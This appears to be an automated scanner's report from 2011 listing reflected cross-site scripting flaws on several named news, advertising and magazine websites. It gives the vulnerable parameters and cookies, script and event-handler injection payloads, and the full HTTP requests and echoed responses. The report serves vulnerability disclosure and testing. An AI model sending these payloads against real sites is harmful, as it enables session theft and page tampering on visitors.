GET /26813/3c003b8f05f4a40792d0446420f9ef23?callback=BF_PARTNER.gate_response5b016<script>alert(1)</script>74d967ff502&cb=8389 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: lighttpd Content-Length: 79 Cache-Control: max-age=604800 Expires: Wed, 12 Oct 2011 14:34:39 GMT Date: Wed, 05 Oct 2011 14:34:39 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f1997<script>alert(1)</script>b478c7f3189 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/570b5c03d148b327600c7b21c4de1c70?callback=BF_PARTNER.gate_responsef1997<script>alert(1)</script>b478c7f3189&cb=7079 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: lighttpd Content-Length: 79 Cache-Control: max-age=604800 Expires: Wed, 12 Oct 2011 14:35:05 GMT Date: Wed, 05 Oct 2011 14:35:05 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f37d4<script>alert(1)</script>a4baf090e45 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/62f6407fe047d99a744b85355711cfdc?callback=BF_PARTNER.gate_responsef37d4<script>alert(1)</script>a4baf090e45&cb=1345 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: lighttpd Content-Length: 79 Cache-Control: max-age=604744 Expires: Wed, 12 Oct 2011 14:40:42 GMT Date: Wed, 05 Oct 2011 14:41:38 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e355a<script>alert(1)</script>e68bb0f9f19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /26813/663fb9f3b96e903356d0d2dedf5d432c?callback=BF_PARTNER.gate_responsee355a<script>alert(1)</script>e68bb0f9f19&cb=8232 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: lighttpd Content-Length: 79 Cache-Control: max-age=604800 Expires: Wed, 12 Oct 2011 14:35:56 GMT Date: Wed, 05 Oct 2011 14:35:56 GMT Connection: close
2.36. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.time.com
Path:
/results.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6955'><script>alert(1)</script>00dde427740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:23:21 GMT Server: Apache Content-Language: en-US Content-Type: text/html;charset=utf-8 Content-Length: 84981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
2.37. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.time.com
Path:
/results.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb0f"><script>alert(1)</script>57c022970d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:23:20 GMT Server: Apache Content-Language: en-US Content-Type: text/html;charset=utf-8 Content-Length: 84411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload f9eaa<img%20src%3da%20onerror%3dalert(1)>195e54f8b9f was submitted in the query parameter. This input was echoed as f9eaa<img src=a onerror=alert(1)>195e54f8b9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the sortBy request parameter is copied into the HTML document as plain text between tags. The payload 64c3a<img%20src%3da%20onerror%3dalert(1)>7321e626e1b was submitted in the sortBy parameter. This input was echoed as 64c3a<img src=a onerror=alert(1)>7321e626e1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the domains request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5fd9'%3balert(1)//0383e943871 was submitted in the domains parameter. This input was echoed as c5fd9';alert(1)//0383e943871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:41:49 GMT Server: Apache Content-Language: en-US Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=1200 Expires: Wed, 05 Oct 2011 15:01:49 GMT Vary: User-Agent,Accept-Encoding Content-Length: 7424
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head>
<script type="text/javascript"> var cnnDocDomain = ''; var docDomains = 'cnn.com|turner.comc5fd9';alert(1)//0383e943871'.split('|'); for (var idx = 0; idx < docDomains.length; idx++) { var d = docDomains[idx]; if (location.hostname.indexOf(d) > ...[SNIP]...
The value of the text request parameter is copied into the HTML document as plain text between tags. The payload 3469b<img%20src%3da%20onerror%3dalert(1)>8cf45b531c2 was submitted in the text parameter. This input was echoed as 3469b<img src=a onerror=alert(1)>8cf45b531c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:41:39 GMT Server: Apache Content-Language: en-US Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=1200 Expires: Wed, 05 Oct 2011 15:01:39 GMT Vary: User-Agent,Accept-Encoding Content-Length: 7502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head>
<script type="text/javascript"> var cnnDocDomain = ''; var docDomains = 'cnn.com|turner.com'.spli ...[SNIP]... <textarea id="jsCode">
{"criteria":[{"target":"web","startAt":"1","maxResults":"10","sortBy":"","order":"","sites":[""],"queries":["xss interest bond mortgage3469b<img src=a onerror=alert(1)>8cf45b531c2"]}],"metaResults":{"web":"0"},"results":[[]],"islCriteria":{"target":"isl","startAt":"1","maxResults":"11","sortBy":"","order":"","sites":[""],"queries":["xss interest bond mortgage3469b<img src=a one ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68883"-alert(1)-"df45a6c10a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the at request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ace7"-alert(1)-"6bf94e7fc81 was submitted in the at parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc245"-alert(1)-"cde73d3e2c6 was submitted in the ci parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57984"-alert(1)-"01885e6ef6d was submitted in the cr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ep request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab52"-alert(1)-"a078b9c7116 was submitted in the ep parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.47. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://secure-us.imrworldwide.com
Path:
/cgi-bin/m
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f04ee"-alert(1)-"8bfa4e88a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e95"-alert(1)-"f9fffea9ba2 was submitted in the pr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee309"-alert(1)-"5aff949030a was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b00"-alert(1)-"afea0a3e879 was submitted in the rt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa094"-alert(1)-"ed6badb8a77 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the MSRSMAG request parameter is copied into an HTML comment. The payload 33afd-->2154f556183 was submitted in the MSRSMAG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the MSRSMAG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b18c2'%3b9cc60c9ea13 was submitted in the MSRSMAG parameter. This input was echoed as b18c2';9cc60c9ea13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload bfe78<script>alert(1)</script>566f067ef66 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:33:13 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.5 Content-Length: 1288 Content-Type: text/json
YUI.Env.JSONP.yui_3_3_0_7_1317825045655135bfe78<script>alert(1)</script>566f067ef66({"conditions":{"meta":{"desc":"Conditions RESTFul service READ call via JSON","version":"2.1.0","input-zip":"20001","input-city":"Washington","input-state":"DC","response-code":100,"response":"The con ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 11546<script>alert(1)</script>83632e3a6ca was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload fd44d<script>alert(1)</script>286805e1ef was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pos request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ab5f1%3balert(1)//eef80b142d7 was submitted in the pos parameter. This input was echoed as ab5f1;alert(1)//eef80b142d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7894"><script>alert(1)</script>14d23470de1 was submitted in the size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9498"%3balert(1)//122e120ff8e was submitted in the size parameter. This input was echoed as f9498";alert(1)//122e120ff8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the tileCounter request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6278c%3balert(1)//196b60afd15 was submitted in the tileCounter parameter. This input was echoed as 6278c;alert(1)//196b60afd15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Expires: Wed, 05 Oct 2011 15:03:03 GMT ntCoent-Length: 3245 Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 3245 Date: Wed, 05 Oct 2011 14:52:35 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title></tit ...[SNIP]... <script type="text/javascript"> var adConfig = new TiiAdConfig("3475.life"); adConfig.setCmSitename("cm.life"); adConfig.setRevSciTracking(true);
var adFactory = null; var tileCounter = 16278c;alert(1)//196b60afd15; var inDapIF=true;
if (parent && parent.adFactory) { var parentAd = parent.adFactory; // instantiate new adFactory object, based on parent adFactory object var ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 38e7b<img%20src%3da%20onerror%3dalert(1)>ccc87e92bc4 was submitted in the url parameter. This input was echoed as 38e7b<img src=a onerror=alert(1)>ccc87e92bc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
2.62. http://www.seahorse.co.uk/shop/products/back_issues.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.seahorse.co.uk
Path:
/shop/products/back_issues.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c155<script>alert(1)</script>aa38bc80652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:20:54 GMT Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d X-Powered-By: PHP/4.4.4 Content-Type: text/html Content-Length: 3410
<!-- header starts here --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Seahorse International Sailing Magazine</title>
The value of the year request parameter is copied into the HTML document as plain text between tags. The payload 98d3c<script>alert(1)</script>c627511222f was submitted in the year parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:20:48 GMT Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d X-Powered-By: PHP/4.4.4 Content-Type: text/html Content-Length: 3409
<!-- header starts here --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Seahorse International Sailing Magazine</title>
The value of the new request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2f1"><script>alert(1)</script>9c9cf0df856 was submitted in the new parameter. This input was echoed as 1f2f1\"><script>alert(1)</script>9c9cf0df856 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!-- header starts here --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Seahorse International Sailing Magazine</title>
...[SNIP]... <input type = text class='formBox' name = "B921f2f1\"><script>alert(1)</script>9c9cf0df856" value = 1 size = 3> ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload b9e8f<script>alert(1)</script>048c06dc6d0 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UIDR cookie is copied into the HTML document as plain text between tags. The payload 9f087<script>alert(1)</script>ea56a26f3e5 was submitted in the UIDR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload 8eded<script>alert(1)</script>f05db26a88e was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload c33b5<script>alert(1)</script>285285dc290 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload 3de2f<script>alert(1)</script>b7b6a60bca was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p117672109 cookie is copied into the HTML document as plain text between tags. The payload ea45f<script>alert(1)</script>1f48ac03819 was submitted in the ar_p117672109 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p119936314 cookie is copied into the HTML document as plain text between tags. The payload 96a74<script>alert(1)</script>9da2ecf03fe was submitted in the ar_p119936314 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p120927104 cookie is copied into the HTML document as plain text between tags. The payload f8340<script>alert(1)</script>0b39a60673d was submitted in the ar_p120927104 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload ba097<script>alert(1)</script>15820b863ab was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload cc7b2<script>alert(1)</script>a2719cdcbe9 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload a288b<script>alert(1)</script>a416727e360 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload f125c<script>alert(1)</script>7f96a50e532 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload 7f117<script>alert(1)</script>b894dfbbedb was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the MSRSMAG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b831"><img%20src%3da%20onerror%3dalert(1)>ecdb6b6b8bb was submitted in the MSRSMAG parameter. This input was echoed as 8b831"><img src=a onerror=alert(1)>ecdb6b6b8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /servlet/Show?WESPAGE=am/Services/load_email.jsp&MSRSMAG=TD8b831"><img%20src%3da%20onerror%3dalert(1)>ecdb6b6b8bb HTTP/1.1 Host: secure.customersvc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://subscription.timeinc.com/storefront/privacy/time/generic_privacy_new.html?dnp-source=E Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
IMW0253E <HTML><HEAD><TITLE>Redirection</TITLE></HEAD><BODY>This document can be found <A HREF="http://secure.customersvc.com/servlet/Show?WESPAGE=am/home.jsp&MSRSMAG=TD8B831"><IMG SRC=A ONERROR=ALERT(1)>ECDB6B6B8BB"> ...[SNIP]...
Report generated by XSS.CX at Wed Oct 05 10:00:13 CDT 2011.